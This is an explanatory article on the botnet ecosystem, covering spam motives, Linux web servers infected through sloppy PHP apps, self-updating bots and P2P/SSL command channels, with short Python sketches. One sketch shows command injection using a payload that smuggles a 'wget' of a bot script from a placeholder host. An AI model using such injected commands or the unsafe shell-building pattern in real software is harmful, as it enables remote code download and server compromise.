The Botnet Ecosystem: Do Botnets Need Windows?
Though Windows exploits are a common enough vector for botnet attacks, not all blame can be placed at Microsoft's feet. The botnet ecosystem claims victims on many platforms.
Botnets exist for two primary reasons.
Executing DDoS attacks, a possibly dying fad, used to be the number one reason; nowadays spam is king. Spam of the innocent we-want-to-sell-you-something type is also dying off, even if it may not seem like it. Legitimate companies have realized that spam is not an effective marketing tool. Appalled customers finally got the word out on that one, thankfully.
Spam in the form of Nigerian scams, phishing attempts, and the promotion of illegal products is the main motivation now. Botnets run open proxy servers, not just mail relays, which give spammers an easy mechanism. At the same time, botnets are flexible and ready to take on new tasks as well. The use of a massively distributed system of unwitting participants: that's the "why."
Attackers infect PCs to install their botnet software, harvest e-mail addresses from your address books, and sometimes even log keystrokes or network traffic. There are secondary motivators, but without people willing to pay bot herders for the ability to spam, the motivation simply wouldn't be great enough to maintain these systems.
While it is true that most bots run on Windows, and most spam comes from consumer broadband connections, this certainly doesn't mean botnets would perish if Windows suddenly became secure enough to stop them.
Botnet clients have been seen in the wild running on Unix-based systems, too. The extreme ease with which Windows can get infected, combined with its market share, explains why most spam originates from compromised Windows machines. Unix systems running a LAMP stack are only as secure as the applications that run on them, and those applications are often abysmal. Sloppily written PHP applications have been the bane of many a sysadmin's existence. Within the last few years, the question has become "why is our Web server spamming?"
That's right: there are plenty of Linux machines out there running botnet clients. Before the widespread adoption of botnets, the worst you'd see was a real, live person trying to execute exploits as the user your Web server runs as. Normally they would fail, you'd clean up their entry point, and everything would be fine. Contrast that with the Windows world, where any inroad leads to total compromise, and you can easily see the difference in security models.
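That "sloppy application" entry point usually comes down to handing attacker-controlled input to a shell. A minimal Python sketch of the bug class; the `convert` thumbnail feature, the filenames, and the URL are all hypothetical:

```python
def build_convert_unsafe(filename: str) -> str:
    # Classic sloppy pattern: build a shell command by string
    # concatenation. A "filename" carrying shell metacharacters
    # becomes code that runs as the web server's unprivileged user.
    return "convert " + filename + " thumb.png"

def build_convert_safe(filename: str) -> list:
    # Argument-list form: the filename is never parsed by a shell,
    # so metacharacters stay inert data.
    return ["convert", filename, "thumb.png"]

payload = "photo.jpg; wget http://example.invalid/bot.pl"
print(build_convert_unsafe(payload))  # the injected command survives intact
print(build_convert_safe(payload))   # the payload is one harmless argument
```

Run through a shell (say, `os.system`), the first form executes the attacker's `wget`; passed as a list to `subprocess.run`, the second treats the whole payload as a single argument to `convert`.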
Regardless of how deep the compromise goes, the damage we're talking about today is done as a normal unprivileged user. A bot client launches, begins running as your Web server's user, and immediately starts sending spam. Q8bot and kaiten are the best-known bots written explicitly for Unix systems, but countless little Perl scripts also pervade LAMP nightmares.
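From the defender's side, that unprivileged spam run has a simple signature: the web server's account suddenly speaking SMTP. A toy sketch of the idea; the snapshot data, user names, and `MAIL_USERS` allow-list are made up, and a real tool would read live socket data from `ss -tnp` or `/proc/net/tcp`:

```python
from collections import Counter
from typing import NamedTuple

class Conn(NamedTuple):
    user: str         # local user owning the socket
    remote_port: int  # destination port

# Hypothetical snapshot of outbound connections on a LAMP box.
snapshot = [
    Conn("www-data", 3306),  # normal: web app talking to its database
    Conn("www-data", 25),    # suspicious: web server speaking SMTP
    Conn("www-data", 25),
    Conn("postfix", 25),     # expected: the real mail daemon
]

MAIL_USERS = {"postfix", "mail"}  # accounts allowed to speak SMTP

def smtp_suspects(conns):
    """Count outbound SMTP connections per user, ignoring accounts
    that legitimately send mail. A web-server user showing up here
    is the "why is our Web server spamming?" signal."""
    counts = Counter(c.user for c in conns
                     if c.remote_port == 25 and c.user not in MAIL_USERS)
    return dict(counts)

print(smtp_suspects(snapshot))  # {'www-data': 2}
```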
There is always vulnerable software to be taken advantage of, and the most widespread packages will be exploited most often. They aren't necessarily less secure than the others; they're just more accessible.
Infection and Survival
The initial infection of botnet client machines was done via worms, but soon the botnets began replicating themselves. Most botnets have the ability to self-update: the bot herder issues an update command, and all his little troops download and run new versions of themselves. This update mechanism is even more efficient than Windows Update, and it's certainly frightening. Some viruses have also been known to disable antivirus software, and most users would never notice. If a virus can successfully disable every defense mechanism and then install undetectable bot client software, it's sure to survive.
The botnet itself is also a worm, because many bots have the ability to spread. They will try a fairly large arsenal of exploits against computers on the same network, or possibly even across the Internet. Self-updating was at first primarily a mechanism for distributing new exploit code, but then something marvelous happened, and the first documented self-preservation behavior appeared: bot clients began DDoS'ing any computer that attempted to detect them by scanning.
Botnets have been dubbed "IRC botnets" in the past, but that label isn't completely accurate any longer. Some newfangled botnets still use IRC to communicate, but they do it over SSL, which essentially means you cannot spot them by inspecting their traffic. Furthermore, the old IRC model of "connect to a server" just isn't feasible: a distributed system that depends on a single server is fragile, especially when that server is a huge takedown target. Many a botnet was abandoned in this infant stage of botnet evolution. We could see it with network anomaly detection tools quite easily: clients would show up looking like a TCP scanner as they unsuccessfully tried connecting to home base over and over again.
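That scanner-like signature is easy to model: repeated failed connection attempts from one source to one dead destination. A minimal sketch of what such an anomaly detector checks, with made-up addresses and an arbitrary threshold:

```python
from collections import defaultdict

def flag_scanners(events, threshold=5):
    """events: iterable of (src, dst, succeeded) connection attempts.
    A host that repeatedly fails to reach the same destination --
    like an orphaned bot hammering its taken-down command server --
    looks exactly like a TCP scanner to an anomaly detector."""
    failures = defaultdict(int)
    for src, dst, ok in events:
        if not ok:
            failures[(src, dst)] += 1
    return {pair for pair, count in failures.items() if count >= threshold}

# Six failed attempts to a dead home base, one normal connection.
events = [("10.0.0.7", "198.51.100.9", False)] * 6 + \
         [("10.0.0.8", "192.0.2.1", True)]
print(flag_scanners(events))  # {('10.0.0.7', '198.51.100.9')}
```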
At this point only one thing comes to mind: peer-to-peer applications. P2P networks have successfully thwarted the MPAA/RIAA, so the model should work for botnets as well. Especially with their ability to replicate and strike back, they should be unstoppable. Indeed, there have been many reports of P2P botnet activity. Throw SSL into the mix, and they are very nearly undetectable and unstoppable.
Let's think about this for a moment. If bots can self-update, self-preserve, and execute massive parallel jobs at the command of a single person, what do we really have here? This is not just a tool for spamming and other ills; this is a living, breathing ecosystem.